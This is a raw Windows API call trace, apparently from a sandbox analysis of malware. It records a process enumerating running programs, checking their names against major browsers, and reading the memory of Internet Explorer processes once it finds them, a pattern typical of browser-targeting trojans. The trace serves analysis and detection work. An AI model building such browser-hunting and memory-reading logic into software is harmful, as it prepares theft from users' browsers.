	[0255.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.258] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0255.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.258] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xaecc
	[0255.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.259] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0255.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.260] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.260] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0255.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.260] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xaed0
	[0255.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.261] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0255.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.262] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.262] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0255.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.263] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xaed4
	[0255.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.264] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0255.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.265] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.265] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0255.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.266] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xaed8
	[0255.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.267] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0255.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.267] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.268] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0255.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.268] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xaedc
	[0255.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.269] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0255.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.269] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.269] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0255.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.270] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xaee0
	[0255.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.271] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0255.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.271] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.272] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0255.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.272] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xaee4
	[0255.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.273] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0255.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.274] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.275] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0255.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.275] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xaee8
	[0255.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.277] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0255.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.277] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.277] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0255.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.278] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.278] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xaeec
	[0255.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.280] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0255.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.280] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.281] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0255.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.282] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.282] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0255.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xaef0
	[0255.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.283] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0255.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.284] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.284] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0255.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.285] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xaef4
	[0255.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.286] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.286] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.286] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.287] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.287] NtQueryInformationProcess (in: ProcessHandle=0xaef4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.287] ReadProcessMemory (in: hProcess=0xaef4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.287] ReadProcessMemory (in: hProcess=0xaef4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.287] ReadProcessMemory (in: hProcess=0xaef4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.288] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xaef8
	[0255.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.290] NtQueryInformationProcess (in: ProcessHandle=0xaef8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.290] ReadProcessMemory (in: hProcess=0xaef8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.290] ReadProcessMemory (in: hProcess=0xaef8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.290] ReadProcessMemory (in: hProcess=0xaef8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.290] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.290] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xaefc
	[0255.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.291] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.291] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.292] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.292] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0255.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xaf00
	[0255.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.293] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0255.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.294] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.294] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0255.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.294] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xaf04
	[0255.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.296] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.296] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xaf08
	[0255.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.299] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.300] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.300] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xaf0c
	[0255.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.302] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.302] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.303] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.303] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xaf10
	[0255.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.304] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.305] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.305] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.305] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.305] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xaf14
	[0255.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.306] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.307] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.307] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.307] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xaf18
	[0255.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.308] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.309] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.309] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.309] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xaf1c
	[0255.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.311] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.311] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.311] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.312] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.312] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xaf20
	[0255.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.313] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.313] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.313] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.314] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
